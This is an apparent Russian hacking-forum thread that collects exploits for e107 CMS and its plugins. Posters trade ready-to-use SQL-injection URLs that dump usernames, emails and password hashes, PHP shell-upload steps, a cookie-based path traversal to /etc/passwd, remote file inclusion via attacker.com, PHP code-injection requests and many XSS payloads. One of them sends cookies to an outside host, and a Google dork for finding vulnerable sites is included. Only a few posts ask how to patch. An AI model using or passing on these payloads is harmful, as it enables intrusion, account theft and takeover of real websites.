![]() |
[ Обзор уязвимостей e107 cms ]
САБЖ
|
Загрузка шела в e107 cms
Админка: " Зайгрузки файлов пользователями ": разрешаем загружать загрузки +"нормальный файл", добавляем " .php " в "Разрешённые типы файлов".
В меню появляются "Загрузка", заливаем файл. target/e107_files/public/file.php +посмотреть полный путь можно через админ панель категория " Зайгрузки файлов пользователями " |
Обзор уязвимостей [e107] cms
<=0.6
file create exploit Уязвимость пристутствует из-за неправильной обработке реквестов к серверу, существует возможность послать свои собственные и создать произвольный файл. <=0.6.17 Active xss PoC 0.617 sql inj + remote code exec Уязвимсоть присутствует из-за плохой проверки на логин. Возможно авторизироваться в админ панели с логином вида Код:
or isnull(1/0)/*<=0.75 globals overwrite Использует перезапись глобальных переменных с помощью пхп-баги - Zend_Hash_Del_Key_Or_Index cookie file include Работвет при register_globals = on, перезаписывает глобальную переменную e_LANGUAGE в кукисах. Код:
Cookie: e107language_e107cookie=../../../../../../../../../etc/passwd%000.7.8 Upload file exploit (нужен админ) Уязвимость присутствует из-за использования popen ф-ии на параметр $mailer, который пеердается через адресную строку в админ панеле. Аплоуд файлов в галерее Нет нормальной проверки на экстеншен. Возможен аплоуд файлов с расширением shell.php.jpg |
Multiple XSS in Chatbox, forum posts:
Код HTML:
[img]/imgsrc.png' onmouseover='alert("Vulnerable");[/img]Код:
In Submit comment:e107 with the Chatbox.php (tagboard) module enabled.DoS. In the Name inputbox of the Chatbox type: Код:
<script = javascript> alert('DoS') <script>Html attachment: Код:
<html>Код:
GET http://virtech.org/e107/e107_plugins/netquery/nquser.php HTTP/1.0XSS in "user settings" (usersettings.php): Код:
http://target/e107_0615/usersettings.php?avmsg=[xss code here]Код:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0.6.15 Код:
http://target/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php0.6.15 Sql injection bug in "news.php": Код:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*Код:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*Код:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* |
Загрузка шела e107 cms
вот типа такого, но можно и без таблиц))но
надо знать диру для записи: Цитата:
|
Фу ты блин а я уж думал нету специальной темы под эту цмс. ГГ откопал)
0.7.11 (мб и ранние версии) Passive XSS Код:
http://e107/e107_plugins/content/handlers/content_preset.php |
Эксплоит автора, который пожелал остаться неизвестным (действует в e107 0.7.8 точно, возможно, и других тоже)
Код:
<form action="http://tanibata.ru/contact.php" method="POST"> |
e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit
Код:
#!/usr/bin/perl |
>Эксплоит автора, который пожелал остаться неизвестным (действует в e107 0.7.8 точно, возможно, и других тоже)
это мой) |
Description: e107 versions 0.7.11 and below suffer from an arbitrary variable overwriting vulnerability.
Код:
########################################################## |
view=1&action=maincats&execute=aWQ=&template_load_ core=echo%20exec
(base64_decode($_POST[execute])); при таком запросе работать не будет, наверно сделали защиту от скрипткидисов view=1&action=list&template_load_core=phpinfo(); скуль фигня самое страшно php-injection PHP код:
Код HTML:
POST http://e107 site /download.php?list.1 HTTP/1.0Код HTML:
POST http://e107 site /download.php?list.1 HTTP/1.0 |
К последним дыркам в download.php есть ли описание как вручную залатать дырки???
|
Цитата:
Я не знаю какую версию смотрели авторы, но у меня на локалке как раз заявленная ими v0.7.11_full Так вот , всё бы хорошо работало, если-бы там был eval() , но там его нет :D И кстати. если бы он там был, никакие SQL типа: Цитата:
Цитата:
|
Вот файл:
http://slil.ru/26072120 Это из версии 7.11, с офф сайта качать бесполезно - пропатчили. |
Вот файл:
http://slil.ru/26072120 Это из версии 7.11, с офф сайта качать бесполезно - пропатчили. И там как раз и есть эти строки: case 'list' : // Category-based listing if (isset($_POST['view'])) extract($_POST); |
Да, сдесь работает
download.php?list id=1&template_load_core=phpinfo(); chekist, молодца |
в е107 интересные bb коды [flash=50,50]javascript:[xss][/flash],
но есть злобный фильтр PHP код:
ЗЫ у ково получится по интереснее использовать багу отпишытесь |
e107 Plugin BLOG Engine v2.2 SQL Injection
Код:
#!/usr/bin/perl |
Active XSS
Версия: 0.7.12 Уязвимый кусок кода: /usersettings.phpЭксплоит: Profile => Click here to update your information => RealName => [Your XSS] |
Цитата:
PHP код:
PHP код:
|
e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit
Уязвимость вышла в свет 21 октября, 2008 © securitylab.ru Уязвимость существует из-за недостаточной обработки входных данных в ключах массива "ue[]" в сценарии usersettings.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Сам эекслойт под неё: http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F361578.php Ну и вопрос, кто нибудь знает как закрыть дырку? |
e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit
e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit
Сплойт: http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F361979.php |
SQL-инъекция в e107 Plugin lyrics_menu
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «l_id» сценарием lyrics_song.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит: PHP код:
|
Обнаружил кривую обработку смайлов. Возможна XSS-атака
Код:
!<script>alert(document.cookie);</script> |
Уточняй, где конкертно возможно провести xss
Что - то мне подсказывает, что тестил ты под правами админа => там идет кривая обработка в функции фильтрации toDB. |
Уязвимости модулей e107
e107 mam_menu Component Blind-SQLinj http://e107.ru/e107_files/downloads/mam_menu2.tar.gz Уязвимый продукт: e107 mam_menu2 (Управление аккаунтами) Версия: e107 0.7.13, mam_menu2 v1.01 1. Blind sqlInjection Уязвимость в файле ban.php Уязвимый кусок кода: PHP код:
Так же из кода видно, что данные в таблице обновляютса и не выводятся - это и есть причина слепоты в данной инъекции. Exploit: Цитата:
Скрипт для работы со слепыми инъекциями от Grey: https://forum.antichat.ru/showpost.php?p=894169&postcount=5 |
e107 Easy Members Search v1.0+ XSS
http://e107.org.ru/download.php?view.149 Уязвимый продукт: Easy Members Search v1.0+ Версия: v1.0+ Условия: magic quotes off 1. XSS Уязвимость в файле ems.php Уязвимый кусок кода: PHP код:
Exploit: Цитата:
|
e107 roll_mini v1.2 (каталог терминов) XSS
http://e107.org.ru/download.php?view.221 Уязвимый продукт: roll_mini (каталог терминов) Версия: v1.2 Условия: magic quotes off 1. XSS Уязвимость в файле roll.php Уязвимый кусок кода: PHP код:
Exploit: Цитата:
|
coppermine_menu (фотогаллерея) Blind sqlInj
http://web.wilan.com.ru/modules.php?name=Files&go=view_file&lid=115 Уязвимый продукт: coppermine_menu (фотогаллерея) Версия: v0.3.3 Blind sqlInj Уязвимость в файле util.php Уязвимый кусок кода: PHP код:
Exploit: Цитата:
|
EasyShop adminXSS
http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.461 Уязвимый продукт: EasyShop Условия: нужни права админа(єсли использовать СИ, то можно заставить админа отправить тебе свои куки..)) XSS Уязвимость в файле admin_main_categories_edit.php Уязвимый кусок кода: PHP код:
Exploit: Цитата:
|
Full path disclosure --last upd
Код:
/online.php |
Version disclosure --last upd
Код:
/e107_admin/credits.php |
xss в плагине форума, в версии v.0.7.15
заголовок темы не фильтруется Код:
><script>alert(1)</script>< |
e107 Plugin userjournals_menu
Код:
################################################################### |
Обнаружил интересную вещь.
Движок e107 так-же неадекватно реагирует на флуд в новостях, если хорошенько зафлудить максимальным количеством символов в 2-3 сообщения, то коментарии к новости вообще никакие не будут отображаться. Любителям сделать гадость на сайте это подойдёт как нельзя кстати. Решение: ограничить количество символов в сообщениях, или не допускать большое кол-во одинаковых символов\слов в сообщении. |
e107 <= 0.7.15 (extended_user_fields) Blind SQL Injection Exploit
Код:
#!/usr/bin/env perl |
ZoGo-Shop e107 plugin
Vuln File: product_details.php Vuln Code: Код:
e107_plugins/zogo-shop/product_details.phpКод:
http://localhost/[path]/e107_plugins/zogo-shop/product_details.php?product=[SQL] |
Есть такая штука...
В файле e107_admin/auth.php PHP код:
Можно дописать после нее echo $authname, и мы увидим резалт. Но у меня на локалхосте так и не получилось что-либо сделать. Выходит какаето ерунда... Запрос вроде есть мускл возвр хендл, но когда идет проверка на кол-во строк возвр 0 Хоть убей не понимаю в чем дело... |
Цитата:
Смотрим e107_handlers/e_parse_class.php Дабы избежать того, на что наткнулся ты, я поставлю /*1*/ в те участки кода, которые браузер воспринимает не так как они есть на самом деле: Код:
function toDB($data, $nostrip = false, $no_encode = false, $mod = false)' -> &#/*1*/039; Что делает браузер? отображает &#/*1*/039; как привычную кавычку. Что делаешь ты? дописываешь в код echo($authname); И видишь, то, что хочешь увидеть - кавычку, а вот если заглянуть в сорец странички (html (Вид - Исходный код страницы)), то можно увидеть что кавычки там нету, а есть &#/*1*/039; |
Уязвимость существует из-за недостаточной обработки входных данных параметра "email" в POST запросе сценария guestbook.php.
Уязвимое поле "E-mail". Сформированные Post data заголовок: Код:
POSTDATA=name=E107 CMS (e107_plugins/guestbook) stored XSS by ettee(itdefence.ru)&email='><script>alert('xss')</script>Google dork: inurl:/e107_plugins/guestbook/guestbook.php Cookie: '><script>img = new Image(); img.src = "http://someshit.net/image/s.gif?"+document.cookie;</script> |
| Время: 13:39 |